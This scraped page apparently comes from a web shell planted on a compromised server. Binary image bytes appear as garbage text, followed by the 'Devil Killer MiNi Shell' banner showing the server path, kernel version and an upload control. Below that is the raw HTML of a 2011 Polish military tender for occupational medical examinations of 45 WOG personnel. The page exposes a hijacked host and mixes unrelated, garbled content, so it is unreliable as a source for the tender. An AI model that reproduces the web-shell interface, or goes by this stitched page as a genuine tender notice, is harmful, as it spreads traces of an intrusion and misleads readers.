JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111223/344285-N-2011.html

<p class="kh_header"><b>Wędrzyn: ŚWIADCZENIE USŁUG MEDYCZNYCH OBEJMUJĄCYCH
PROFILAKTYCZNE BADANIA LEKARSKIE (WSTĘPNE,
OKRESOWE, KONTROLNE, SANITARNO-EPIDEMIOLOGICZNE,
BADANIA DIAGNOSTYCZNE, BADANIA LABORATORYJNE,
BADANIA PSYCHOTECHNICZNE, KONSULTACJE
SPECJALISTYCZNE), ŻOŁNIERZY I PRACOWNIKÓW 45
WOJSKOWEGO ODDZIAŁU GOSPODARCZEGO ORAZ ŻOŁNIERZY
I PRACOWNIKÓW JEDNOSTEK BĘDĄCYCH NA ZAOPATRZENIU 45
WOG</b><br>
<b>Numer ogłoszenia: 344285 - 2011; data zamieszczenia: 23.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 5701 Wędrzyn , 69-211 Wędrzyn, woj. lubuskie, tel. 95 7556236, faks 95 7556222.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Skarbu Państwa podległa MON.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG MEDYCZNYCH OBEJMUJĄCYCH
PROFILAKTYCZNE BADANIA LEKARSKIE (WSTĘPNE,
OKRESOWE, KONTROLNE, SANITARNO-EPIDEMIOLOGICZNE,
BADANIA DIAGNOSTYCZNE, BADANIA LABORATORYJNE,
BADANIA PSYCHOTECHNICZNE, KONSULTACJE
SPECJALISTYCZNE), ŻOŁNIERZY I PRACOWNIKÓW 45
WOJSKOWEGO ODDZIAŁU GOSPODARCZEGO ORAZ ŻOŁNIERZY
I PRACOWNIKÓW JEDNOSTEK BĘDĄCYCH NA ZAOPATRZENIU 45
WOG.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są: usługi medyczne obejmujące profilaktyczne badania lekarskie (wstępne, okresowe, kontrolne, sanitarno-epidemiologiczne, badania diagnostyczne, badania laboratoryjne, badania psychotechniczne, konsultacje specjalistyczne), Żołnierzy i pracowników cywilnych 45 WOJSKOWEGO ODDZIAŁU GOSPODARCZEGO oraz Żołnierzy i pracowników jednostek będących na zaopatrzeniu 45 WOG.

Zamawiający podzielił przedmiot zamówienia na 3 zadania:

Zadanie 1- Usługi medyczne dla żołnierzy i pracowników 45 WOG oraz żołnierzy i pracowników jednostek będących na zaopatrzeniu 45 WOG (zał. 2a do SIWZ). Wykonawca realizujący przedmiot zamówienia musi dysponować gabinetem lekarskim medycyny pracy oraz bazą do wykonywania badań laboratoryjnych i innych określonych w załączniku nr 2 do SIWZ  w odległości do 50km od siedziby JW. 5701 w Wędrzynie 

Zadanie nr 2 - Usługi medyczne dla żołnierzy i pracowników jednostki 5700 w Międzyrzeczu będącej na zaopatrzeniu 45 WOG (zał. 2b do SIWZ). Wykonawca realizujący przedmiot zamówienia musi dysponować gabinetem lekarskim medycyny pracy oraz bazą do wykonywania badań laboratoryjnych i innych określonych w załączniku nr 2 do SIWZ w odległości do 50km od siedziby JW. 5700 w Międzyrzeczu 

Zadanie nr 3 - Usługi medyczne dla żołnierzy i pracowników Jednostki Wojskowej 3949 
w Skwierzynie oraz WKU w Gorzowie Wlkp. będących na zaopatrzeniu 45 WOG (zał. 2c do SIWZ) . Wykonawca realizujący przedmiot zamówienia musi dysponować gabinetem lekarskim medycyny pracy oraz bazą do wykonywania badań laboratoryjnych i innych określonych w załączniku nr 2 do SIWZ w odległości do 50km od siedziby JW. 3949 w Skwierzynie oraz WKU i Pracowni Psychologicznej w Gorzowie Wlkp.

 Zamawiający przewiduje szacunkową ilość żołnierzy i pracowników cywilnych do wykonania badań z zakresu medycyny pracy na 2012r.:
Zadanie nr 1 - 291 osób,
Zadanie nr 2 - 3009 osób,
Zadanie nr 3 - 366 osób.
Ilości te mogą ulec zmianie w związku ze zmianą poziomem zatrudnienia i badaniami kontrolnymi PC i ŻW.  

1.	Przedmiot zamówienia będzie realizowany zgodnie z rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz.U. Nr 69, poz. 332, z późn. zm.), (badania diagnostyczne, badania laboratoryjne, badania psychotechniczne, konsultacje specjalistyczne) w szczególności:
1)	 wykonywanie profilaktycznych badań lekarskich żołnierzy i pracowników wojska - wstępnych, okresowych i  kontrolnych, zwanych dalej badaniami  profilaktycznymi,
2)	wydawania orzeczeń lekarskich do celów przewidzianych w Kodeksie pracy i przepisach wykonawczych, 
3)	wykonywanie badań lekarskich do celów sanitarno - epidemiologicznych, badań kierowców
4)	udzielania innych świadczeń zdrowotnych, do których zapewnienia w myśl odrębnych przepisów jest obowiązany pracodawca, 
5)	zapewnienie  udziału  lekarza  sprawującego  profilaktyczną  opiekę  zdrowotną  nad pracownikami w pracach komisji bezpieczeństwa i higieny pracy Zamawiającego 2012r, 
6)	wykonywanie badań laboratoryjnych zleconych przez lekarza medycyny pracy,
7)	wykonanie zdjęć rentgenowskich zleconych przez lekarza medycyny pracy,
8)	wykonanie opisów badań,
9)	prowadzenie działalności konsultacyjnej, diagnostycznej i leczniczej w zakresie patologii zawodowej,
10)	prowadzenia czynnego poradnictwa w stosunku do chorych na choroby związane     z wykonywaną pracą,
11)	monitorowanie stanu zdrowia pracujących w grupach szczególnego ryzyka,
12)	prowadzenie analiz stanu zdrowia żołnierzy oraz pracowników pod względem występowania chorób zawodowych i wypadków przy pracy,
13)	gromadzenie  i przechowywanie (zgodnie z przepisami) informacji o ryzyku zawodowym i stanie zdrowia osób objętych profilaktyczno opieką lekarską.
2.	Badania lekarskie do celów sanitarno-epidemiologicznych wykonywane będą przez lekarzy w trybie przepisów ustawy z dnia 5 grudnia 2008 r. o zapobieganiu oraz zwalczaniu zakażeń i chorób zakaźnych u ludzi (Dz. U. Nr 234, poz. 1570).
3.	Wykonawca zagwarantuje niezmienność cen jednostkowych określonych w ofercie.
4.	Organizacja świadczenia usług medycznych:
1)	wykonawca przeprowadzi badania profilaktyczne na podstawie skierowania wydawanego przez Zamawiającego, zawierającego informacje o występowaniu czynników szkodliwych dla zdrowia lub warunków uciążliwych na danym stanowisku pracy, 
2)	bieżąca realizacja usług medycznych będzie wykonywana w dni robocze tj. od poniedziałku do piątku, od godz.700  do godz. 1500,
3)	badania wstępne i okresowe wykonywane będą po telefonicznym lub osobistym zgłoszeniu się osoby skierowanej i ustaleniu terminu i godziny rozpoczęcia badań, termin rozpoczęcia badań zaproponowany przez Wykonawcę nie może przekraczać okresu 2 dni roboczych od dnia zgłoszenia się skierowanej osoby,
4)	badania wstępne i okresowe wykonywane będą w dniu zgłoszenia się skierowanego pracownika Zamawiającego a zakończone nie później niż następnego dnia roboczego po dniu rozpoczęciu badań,
5)	w przypadku stwierdzenia konieczności wykonania specjalistycznego badania konsultacyjnego lub badania dodatkowego, niezbędnego dla prawidłowej oceny stanu zdrowia osoby przyjmowanej do pracy lub pracownika, termin oczekiwania na to badanie nie przekroczy 7 dni roboczych,
6)	wykonawca zapewnia bieżącą realizację usług medycznych, w szczególności dyżur od poniedziałku do piątku lekarza uprawnionego do wykonywania badań profilaktycznych, oraz zastępstwa w razie czasowej nieobecności lekarzy specjalistów,
7)	w zawodach wymagających dodatkowych specjalistycznych badań osób kierowanych Zamawiający uznaje za konieczne przeprowadzenie dodatkowych badań  zgodnie z obowiązującymi przepisami, 
8)	badania lekarskie kończą się wydaniem orzeczenia lekarskiego w formie zaświadczenia stwierdzającego:
- brak przeciwwskazań zdrowotnych do pracy na określonym stanowisku pracy,
- przeciwwskazania zdrowotne do pracy na określonym stanowisku pracy.
Orzeczenie lekarskie otrzymuje bezpośrednio żołnierz lub  pracownik cywilny, który był badany.
9)	Wskazane jest aby konsultacje i badania dodatkowe odbywały się w tej samej lokalizacji co gabinet medycyny pracy, bez potrzeby przemieszczania się do innych placówek.
10)	Wykonawca akceptuje fakt, iż ilość badań lekarskich wyszczególnionych w załączniku nr 2 są ilościami szacunkowymi. Zamawiający zastrzega sobie możliwość ich zmniejszenia lub zwiększenia w sytuacjach uzasadnionych ważnymi powodami ,a w szczególności zmniejszeniem się stanu osobowego JW.
11)	Zamawiający nie ponosi konsekwencji finansowych zmniejszenia ilości badań.
12)	Wykonawcy należy się wynagrodzenie za faktycznie przeprowadzone badania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.12.00.00-6, 85.12.12.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- posiadają wpis do rejestru Zakładów Opieki Zdrowotnej prowadzony przez Ministra Zdrowia i Opieki Społecznej lub Wojewodę</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedmiot zamówienia winien być realizowany przez personel spełniający wymagania określone w obowiązujących przepisach, a w szczególności w ustawie z dnia 27 czerwca 1997r. o służbie medycyny (tekst jednolity: Dz. U. z 2004 roku Nr 125, poz. 1317 z późn. zm.) rozporządzeniach wydanych na jej podstawie, oraz rozporządzeniu MZiOS z dnia 30 maja 1996roku w sprawie przeprowadzenia badań lekarskich pracowników, z zakresu profilaktycznej opieki zdrowotnej nad pracownikami, oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. Nr. 69,poz 332 z późn, zm. Wymagania określone w wymienionych przepisach spełniają:
           a).Lekarze, o których mowa w przepisach wydanych na podstawie art. 229 § 8  Kodeksu Pracy.
            b).lekarze, którzy pełnili służbę lub byli zatrudnieni w pełnym wymiarze czasu pracy przez okres co najmniej 3 lata jako lekarze w jednostkach organizacyjnych wyłącznie w stosunku do żołnierzy i pracowników objętych ich opieką w tych jednostkach</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Kopie dokumentów potwierdzających wymagane kwalifikacje niezbędne do prowadzenia medycyny pracy
2.	Aktualny odpis rejestru Zakładów Opieki Zdrowotnej prowadzony przez Ministra Zdrowia i Opieki Społecznej lub Wojewodę (zgodnie z art.12 ustawy z dnia 30.08.1991r. o Zakładach Opieki Zdrowotnej - tekst jednolity Dz. U. z 2007r. Nr 14, poz. 89 z późniejszymi zmianami).

3.	Oferta cenowa sporządzona wg wzoru formularza stanowiącego załącznik nr 1 do SIWZ
4.	Formularz cenowy, wypełniony wg wzoru stanowiącego załącznik nr 2 a,b,c do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Poza postanowieniami określonymi w umowie Zamawiający przewiduje możliwość innych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. Każda zmiana i uzupełnienie umowy, będzie wymagać aneksu w formie pisemnej pod rygorem nieważności. Poza innymi przypadkami określonymi w treści Umowy, zmiany Umowy będą mogły być wprowadzane w związku z zaistnieniem okoliczności, których wystąpienia Zamawiający i Wykonawca nie przewidywali w chwili zawierania Umowy. Wskazane okoliczności nie mogą być wywołane zarówno przez Zamawiającego, jak i Wykonawcę, ani przez nich zawinione i muszą wywoływać ten skutek, iż Umowa nie będzie mogła być wykonana wedle pierwotnej treści, w szczególności z uwagi na rażącą stratę grożącą jednemu z nich lub niemożność osiągnięcia celu Umowy. Okoliczności te odnosić się mogą w szczególności do wystąpienia nagłych zmian stanu prawnego, gwałtownej dekoniunktury, kryzysów finansowych w skali ponadpaństwowej, konieczności uwzględnienia wpływu ewentualnych prac zamiennych na realizację przedmiotu umowy.
2. Niezależnie od powyższego, Zamawiający dopuszcza możliwość zmian redakcyjnych Umowy oraz zmian będących następstwem zmian danych zarówno jego, jak i Wykonawcy ujawnionych w rejestrach publicznych, a także zmian korzystnych z punktu widzenia realizacji przedmiotu umowy, w szczególności przyspieszających realizację, obniżających koszt ponoszony przez Zamawiającego na wykonanie, utrzymanie lub użytkowanie przedmiotu umowy bądź zwiększających użyteczność przedmiotu umowy. W takiej sytuacji, wprowadzone zostaną do umowy stosowne zmiany weryfikujące redakcyjne dotychczasowe brzmienie umowy bądź wskazujące nowe dane wynikające ze zmian w rejestrach publicznych albo też kierując się poszanowaniem wzajemnych interesów, zasadą równości oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem wykonania przedmiotu umowy, określą zmiany korzystne z punktu widzenia realizacji przedmiotu umowy. Wszelkie zmiany wprowadzane do umowy dokonywane będą z poszanowaniem obowiązków wynikających z obowiązującego prawa, w tym w szczególności art. 140 ust. 3 PZP oraz zasad ogólnych rządzących tą ustawą.

2.	Prawa, obowiązki i wierzytelności związane z realizacją niniejszej umowy nie mogą być przenoszone przez Wykonawcę na osoby trzecie.

4. Wykonawca jest zobowiązany do niezwłocznego i pisemnego poinformowania
Zamawiającego o wszelkiej zmianie swych danych teleadresowych pod rygorem wysłania pism na uprzedni adres (faks) ze skutkiem doręczenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 5701 Wędrzyn
69-211 Wędrzyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.01.2012 godzina 10:00, miejsce: Jednostka Wojskowa 5701 Wędrzyn
69-211 Wędrzyn
kancelaria jawna bud. nr 33.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> NA ŚWIADCZENIE USŁUG MEDYCZNYCH OBEJMUJĄCYCH
PROFILAKTYCZNE BADANIA LEKARSKIE (WSTĘPNE,
OKRESOWE, KONTROLNE, SANITARNO-EPIDEMIOLOGICZNE,
BADANIA DIAGNOSTYCZNE, BADANIA LABORATORYJNE,
BADANIA PSYCHOTECHNICZNE, KONSULTACJE
SPECJALISTYCZNE), ŻOŁNIERZY I PRACOWNIKÓW 45
WOJSKOWEGO ODDZIAŁU GOSPODARCZEGO ORAZ ŻOŁNIERZY
I PRACOWNIKÓW JEDNOSTEK BĘDĄCYCH NA ZAOPATRZENIU 45
WOG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1- Usługi medyczne dla żołnierzy i pracowników 45 WOG oraz żołnierzy i pracowników jednostek będących na zaopatrzeniu 45 WOG (zał. 2a do SIWZ). Wykonawca realizujący przedmiot zamówienia musi dysponować gabinetem lekarskim medycyny pracy oraz bazą do wykonywania badań laboratoryjnych i innych określonych w załączniku nr 2 do SIWZ  w odległości do 50km od siedziby JW. 5701 w Wędrzynie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.12.00.00-6, 85.12.12.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ŚWIADCZENIE USŁUG MEDYCZNYCH OBEJMUJĄCYCH
PROFILAKTYCZNE BADANIA LEKARSKIE (WSTĘPNE,
OKRESOWE, KONTROLNE, SANITARNO-EPIDEMIOLOGICZNE,
BADANIA DIAGNOSTYCZNE, BADANIA LABORATORYJNE,
BADANIA PSYCHOTECHNICZNE, KONSULTACJE
SPECJALISTYCZNE), ŻOŁNIERZY I PRACOWNIKÓW 45
WOJSKOWEGO ODDZIAŁU GOSPODARCZEGO ORAZ ŻOŁNIERZY
I PRACOWNIKÓW JEDNOSTEK BĘDĄCYCH NA ZAOPATRZENIU 45
WOG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 - Usługi medyczne dla żołnierzy i pracowników jednostki 5700 w Międzyrzeczu będącej na zaopatrzeniu 45 WOG (zał. 2b do SIWZ). Wykonawca realizujący przedmiot zamówienia musi dysponować gabinetem lekarskim medycyny pracy oraz bazą do wykonywania badań laboratoryjnych i innych określonych w załączniku nr 2 do SIWZ w odległości do 50km od siedziby JW. 5700 w Międzyrzeczu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.12.00.00-6, 85.12.12.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ŚWIADCZENIE USŁUG MEDYCZNYCH OBEJMUJĄCYCH
PROFILAKTYCZNE BADANIA LEKARSKIE (WSTĘPNE,
OKRESOWE, KONTROLNE, SANITARNO-EPIDEMIOLOGICZNE,
BADANIA DIAGNOSTYCZNE, BADANIA LABORATORYJNE,
BADANIA PSYCHOTECHNICZNE, KONSULTACJE
SPECJALISTYCZNE), ŻOŁNIERZY I PRACOWNIKÓW 45
WOJSKOWEGO ODDZIAŁU GOSPODARCZEGO ORAZ ŻOŁNIERZY
I PRACOWNIKÓW JEDNOSTEK BĘDĄCYCH NA ZAOPATRZENIU 45
WOG.</p>
